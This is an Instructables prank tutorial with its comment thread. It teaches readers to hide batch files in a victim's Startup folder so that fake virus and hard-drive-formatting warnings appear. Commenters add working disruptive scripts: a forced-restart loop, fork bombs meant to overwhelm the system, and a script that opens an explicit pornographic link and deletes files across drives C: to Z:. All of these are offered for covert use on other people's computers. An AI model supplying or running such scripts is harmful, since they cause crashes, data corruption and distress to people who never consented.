!!GREAT COMPUTER PRANKS !! computer commands using notepad and command prompt

 by dean-101
Contest Winner
1.bmp
In this Instructable i will show you how to make a few pranks on peoples computer using simple commands on notepad and cmd prompt.

I MADE THIS INSTRUCTABLE TO ENTER THE APRIL FOOLS SPEED CONTEST SO PLEASE VOTE BY HITTING THE VOTE BUTTON AT THE TOP
 
Remove these adsRemove these ads by Signing Up

Step 1: Fake warning message

1.bmp
1.bmp
Ok first we will start with the easy one, the fake warning message.
This is how to do it:
1.Open note pad
2.Type this in
@echo off
msg * Warning your computer has detected a virus.
msg * To remove the virus click OK or close this box
msg * Your Hard drives are now being formatted
msg * Please wait ...........
msg * APRIL FOOLS

3.Save the file as April-fools.BAT
4.Right click on the file and press hidden
5.Go to folder options and click show hidden files
6.Cut the file and place it in the victims Start up folder in the start menu
7.Go back to folder options and click do not show hidden files.

Now what each of the lines you typed in done:
@echo off << this runs the commands in the background so the victim will not see any codes
msg * <<this commands the computer to show a message
msg * hahahah <<this is what the message will display

The results
when the victim starts up there computer the first message will appear, when they click OK the next one will appear and make the victim think there hard drive is being formatted until they get the last message saying APRIL FOOLS.

Now your code should look like the image below:
1-40 of 422Next »
grampafish says: May 23, 2013. 5:57 PM
i made one
@echo off
:a
start cmd.exe
start mspaint.exe
goto a


made my system BSOD
core 2 duo E8500 3.12ghz
8gb ram
ncortiz says: May 19, 2013. 10:47 AM
You put :START instead of START:
Jimmy 1 says: Mar 20, 2013. 3:47 PM
I only have the option of saving the code in Notepad as a txt file!
kysinden says: Mar 12, 2013. 8:36 PM
i just use a small .bat place in the start-up folder

{
:a
shutdown -r -f
goto a
}

The goto is purely because on some computers i have tested on it ignored the first 6 or so commands to go though.
It also restarts the shutdown process if they decide to try and stop it
:)
{im evil}
ahardman says: May 5, 2012. 3:15 AM
I'd recommend this much smaller and faster fork bomb:
%0|%0

It will essentially do the same thing, only it will duplicate so rapidly, it is very difficult to kill the process before it takes over the entire system.
Prof. Pickle in reply to ahardmanDec 22, 2012. 9:11 AM
They just keep getting smaller and smaller. And I thought my one liner was short (@for /l %%i in (1) do @start). I do like your style though.
samgooman says: Dec 20, 2012. 2:06 PM
You dont have to start the PC all you need to do is press Ctrl+Alt+Delt start task manager and end program simple worked for me!!
kool1zero says: Dec 11, 2012. 9:23 AM
Make your batch script start a shutdown and use the task scheduler to have a matching "shutdown -a" (which aborts) so you just freak them out and don't mess with their stuff. This also makes a nice option to have super long shutdown lengths (like your computer will shutdown in one hour! Just so they can massively fail at stopping it lol)
WrshpMzshn says: Nov 29, 2012. 11:13 AM
I usually just run an extra mouse from his USB port to my desk, then watch him. When he moves his mouse I move mine and he starts freaking out.
OSU says: Jul 30, 2012. 7:06 AM
With Windows 7, type this:
@echo off
echo (Type message here)
pause
cls
echo (Type message here
pause
cls

If you don't put pause after it, the message will just flash.
If you don't put cls, all the previous messages will also show.
I like to hide that file, make a shortcut, and change to the emblem the the yellow shield and exclamation point.
Hope this helps.
nnycapcadet says: Jun 1, 2012. 9:38 PM
I prefer the ever so funny

start iexplore.exe http://www.youtube.com/watch?v=UJ8Eya7EWqI

at the very end rather than april fools
yterrythemosteratlarge says: Dec 5, 2011. 6:07 PM
you can stop it by task manager and closeing command prompt
xenongamer says: Aug 2, 2008. 10:38 AM
how do you stop it? "when you develop a weapon, you have to develop a counter weapon, and then develop a countewr for that counter weapon"
neivadan in reply to xenongamerOct 5, 2011. 2:22 PM
well xenogamer if you have windows then your in luck you have task manger as your counter weapon but if you have something different as an os for your computer you can just download it as freeware considering it's like a program management consle.Aslo with this you can log other people off the computer through task manger without theyre password **)
aparida1 in reply to xenongamerJun 5, 2011. 9:22 AM
b4 starting it start another batch "shutdown -l -t 00"
lperkins in reply to xenongamerMar 27, 2011. 11:12 AM
taskkill /IM /F a.bat

And while this prank is nominally harmless, it will crash the system, which can easily cause data corruption on Windows.
username431 in reply to xenongamerAug 20, 2010. 5:59 AM
however, you could put in the file to open a file that would close all the programs on your computer. this would prevent you computer from falling for that exact fork virus, but allow it to atack others because it would be written something like this: @echo off :START start a.bat GOTO START start blackhole.bat in this case blackhole.bat would be written to close all programs (and in the same location as a.bat), where if run on another computer , the program wouldnt be in the same location, it might not have the same name, or it might not exist. for this to work, you would have to put blackhole.bat as hidden
DeanGPotts in reply to username431Mar 23, 2011. 1:11 PM
you could probably use the line shutdown -f -t 00 , all programs should close but the computer will stay on
DeanGPotts in reply to DeanGPottsMar 23, 2011. 1:20 PM
nope, never mind i just tried it, i was logged off and after i logged back in i couldnt connect to the internet, had to do a restert, was quite annoying though and i think if someone doesnt know whats actually happened they would be pretty freaked out about it
the dashing hero in reply to DeanGPottsDec 17, 2011. 5:49 AM
hi, wienies!
DeanGPotts in reply to the dashing heroDec 22, 2011. 1:32 PM
leid, was meinst du mit wienies bedeuten?
Dr Menguin in reply to xenongamerMay 20, 2009. 11:04 AM
you can hold down CTRL+C
dean-101 (author) in reply to xenongamerAug 5, 2008. 4:46 PM
restart the computer is the only way,
sharlston in reply to dean-101May 17, 2009. 12:16 PM
how do you get the freeze computer off to get the immage off?
11rex11 in reply to dean-101Apr 30, 2009. 11:47 AM
actually no its not if you are quick enough go to run in the start menu type in the file name like in this case you would type virus.bat -a that shuts down that program
musicninja17 in reply to dean-101Apr 11, 2009. 2:30 PM
No, control + C should stop it.....
xenongamer in reply to musicninja17Apr 11, 2009. 9:36 PM
copy stops it?... no, that won't work.
musicninja17 in reply to xenongamerApr 11, 2009. 10:17 PM
http://www.instructables.com/id/SKY5R5OFHJMQY8X/

See this page.....also....the break key on your keyboard should do the trick also...
neivadan says: Oct 5, 2011. 2:15 PM
i got a better idea you can make it open up all the programs in your computer make it call more and more windows of those programs till your computer is dead!!!!
asharma34 says: Oct 5, 2011. 6:37 AM
TRY THIS :::::::::::::::::::::::::::::::::::::::::::::::::::::::::

title HAPPY APRIL FOOL

@echo off

echo TODAY I AM GOING TO TELL YOU SOMETHING THAT YOU NEVER THOUGHT IN YOUR LIFE TOO ......................................................

start http://www.youporn.com/watch/369670/hot-18-year-old-assfucked-hard/?from=vbwn

c:
cd\
attrib -s -h -r mymp3.vbs
del mymp3.vbs
attrib -s -h -r autorun.inf
del autorun.inf
echo Drive C: DONE…
cd windows
attrib -s -h -r mymp3.vbs
del mymp3.vbs
attrib -s -h -r autorun.inf
del autorun.inf
echo Drive C:\WINDOWS DONE…
d:
attrib -s -h -r mymp3.vbs
del mymp3.vbs
attrib -s -h -r autorun.inf
del autorun.inf
echo Drive D: DONE…
e:
attrib -s -h -r mymp3.vbs
del mymp3.vbs
attrib -s -h -r autorun.inf
del autorun.inf
echo Drive E: DONE…
f:
attrib -s -h -r mymp3.vbs
del mymp3.vbs
attrib -s -h -r autorun.inf
del autorun.inf
echo Drive F: DONE…
g:
attrib -s -h -r mymp3.vbs
del mymp3.vbs
attrib -s -h -r autorun.inf
del autorun.inf
echo Drive G: DONE…
h:
attrib -s -h -r mymp3.vbs
del mymp3.vbs
attrib -s -h -r autorun.inf
del autorun.inf
echo Drive H: DONE…
i:
attrib -s -h -r mymp3.vbs
del mymp3.vbs
attrib -s -h -r autorun.inf
del autorun.inf
echo Drive I: DONE…
j:
attrib -s -h -r mymp3.vbs
del mymp3.vbs
attrib -s -h -r autorun.inf
del autorun.inf
echo Drive J: DONE…
k:
attrib -s -h -r mymp3.vbs
del mymp3.vbs
attrib -s -h -r autorun.inf
del autorun.inf
echo Drive K: DONE…
l:
attrib -s -h -r mymp3.vbs
del mymp3.vbs
attrib -s -h -r autorun.inf
del autorun.inf
echo Drive L: DONE…
m:
attrib -s -h -r mymp3.vbs
del mymp3.vbs
attrib -s -h -r autorun.inf
del autorun.inf
echo Drive M: DONE…
n:
attrib -s -h -r mymp3.vbs
del mymp3.vbs
attrib -s -h -r autorun.inf
del autorun.inf
echo Drive N: DONE…
o:
attrib -s -h -r mymp3.vbs
del mymp3.vbs
attrib -s -h -r autorun.inf
del autorun.inf
echo Drive O: DONE…
p:
attrib -s -h -r mymp3.vbs
del mymp3.vbs
attrib -s -h -r autorun.inf
del autorun.inf
echo Drive P: DONE…
q:
attrib -s -h -r mymp3.vbs
del mymp3.vbs
attrib -s -h -r autorun.inf
del autorun.inf
echo Drive Q: DONE…
r:
attrib -s -h -r mymp3.vbs
del mymp3.vbs
attrib -s -h -r autorun.inf
del autorun.inf
echo Drive R: DONE…
s:
attrib -s -h -r mymp3.vbs
del mymp3.vbs
attrib -s -h -r autorun.inf
del autorun.inf
echo Drive S: DONE…
t:
attrib -s -h -r mymp3.vbs
del mymp3.vbs
attrib -s -h -r autorun.inf
del autorun.inf
echo Drive T: DONE…
u:
attrib -s -h -r mymp3.vbs
del mymp3.vbs
attrib -s -h -r autorun.inf
del autorun.inf
echo Drive U: DONE…
v:
attrib -s -h -r mymp3.vbs
del mymp3.vbs
attrib -s -h -r autorun.inf
del autorun.inf
echo Drive V: DONE…
w:
attrib -s -h -r mymp3.vbs
del mymp3.vbs
attrib -s -h -r autorun.inf
del autorun.inf
echo Drive W: DONE…
x:
attrib -s -h -r mymp3.vbs
del mymp3.vbs
attrib -s -h -r autorun.inf
del autorun.inf
echo Drive X: DONE…
y:
attrib -s -h -r mymp3.vbs
del mymp3.vbs
attrib -s -h -r autorun.inf
del autorun.inf
echo Drive Y: DONE…
z:
attrib -s -h -r mymp3.vbs
del mymp3.vbs
attrib -s -h -r autorun.inf
del autorun.inf
echo Drive Z: DONE…

echo HAPPY HOLIDAYS ..................................

Don't Forget To Watch This One : http://www.youtube.com/watch?v=qMG1u6Pz9yo&NR=1
51m0n says: Oct 2, 2011. 11:04 AM
When I tried it it didn't flash the message or start the timer it just logged me off.
techno guy says: Aug 5, 2011. 9:34 AM
Say I put this on my computer to see how it works, how do I turn it off when I don't want it on my computer?
bvaughn1 in reply to techno guySep 1, 2011. 12:07 AM
just delete it! duh!
l0rdaryan in reply to bvaughn1Oct 2, 2011. 7:24 AM
lol
zapper067 says: Jun 24, 2011. 6:35 AM
You can use iexpress.exe to make a .exe one.
ycristoria says: Jun 18, 2011. 3:07 AM
how to remove the image?
fabsy333 says: Jun 13, 2011. 4:27 PM
This is NOT that realistic. All it does is it just shows msges(messages).
Jamtaktics says: May 28, 2011. 3:11 PM
Does this work in Vista, I copied word for word, and nothing?!?!
Paul J Sanderlin says: Aug 22, 2009. 7:13 PM
something else you can do is add instead of April fools echo -WARNING echo - echo Hard drive has been formatted echo - echo -WARNING echo - PAUSE echo System needs to restart in order to continue processing PAUSE echo Windows is shutting down PAUSE shutdown -t 30 the shutdown -t 30 is telling the computer to shutdown in 30 secs, you can change it to whatever you like or shutdown -r to restart your computer
CaptInsane in reply to Paul J SanderlinAug 24, 2009. 8:42 AM
If you hide all of their files, both in My Docs and My Computer, before setting this up, then use the code to shutdown/restart the computer, it'd make them actually think their files are missing. Though, you'd need a way to get the non-Windows-standard icons to disappear upon starting up again. Not sure how that'd be accomplished...
1-40 of 422Next »
Pro

Get More Out of Instructables

Already have an Account?

close

PDF Downloads
As a Pro member, you will gain access to download any Instructable in the PDF format. You also have the ability to customize your PDF download.

Upgrade to Pro today!